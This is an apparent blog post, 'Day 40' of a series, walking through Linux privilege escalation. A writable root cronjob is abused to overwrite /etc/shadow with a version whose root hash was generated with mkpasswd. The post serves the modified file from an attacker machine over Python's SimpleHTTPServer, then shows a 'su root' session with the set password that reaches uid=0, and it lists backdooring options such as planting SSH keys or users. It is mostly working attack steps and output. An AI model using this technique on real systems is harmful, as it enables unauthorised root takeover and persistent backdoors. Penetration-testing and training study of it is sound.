Day 40: Privilege Escalation (Linux) by Modifying Shadow File for the Easy Win

Scenario

You can abuse a cronjob or script running as root, it allows you to write somewhere and control what is written. You can do a lot here, add your own ssh key, add your own user, backdoor code etc but one of my quick and easy favourites it to replace shadow file with my modified one where I set the root password.

Original File

root:$6$RIgrVboA$HDaB29xvtkw6U/Mzq4qOHH2KHB1kIR0ezFyjL75DszasVFwznrsWcc1Tu5E2K4FA7/Nv8oje0c.bljjnn6FMF1:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

Generate a new Shadow Hash

root@kali:~/# mkpasswd  -m sha-512 -S saltsalt -s 
Password: pwned123
$6$saltsalt$HOC6AvLVkxCTYnJ5Tc78.CYF/KdcBDmheMbOGQTqiMUZhdKof7eXjN9/6I3w8smybsEQEaz5Vh8aoGGs71hf20

Modified File

root:$6$saltsalt$HOC6AvLVkxCTYnJ5Tc78.CYF/KdcBDmheMbOGQTqiMUZhdKof7eXjN9/6I3w8smybsEQEaz5Vh8aoGGs71hf20:17673:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

Now Write the File via Vulnerability and Profit

root@kali:~/# python -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
10.10.10.150 - - [08/Feb/2019 03:27:11] "GET /shadow HTTP/1.1" 200 

Easy Root

daisy@vulnerable:~/# su root
Password: pwned123
root@vulnerable:/# id
uid=0(root) gid=0(root) groups=0(root)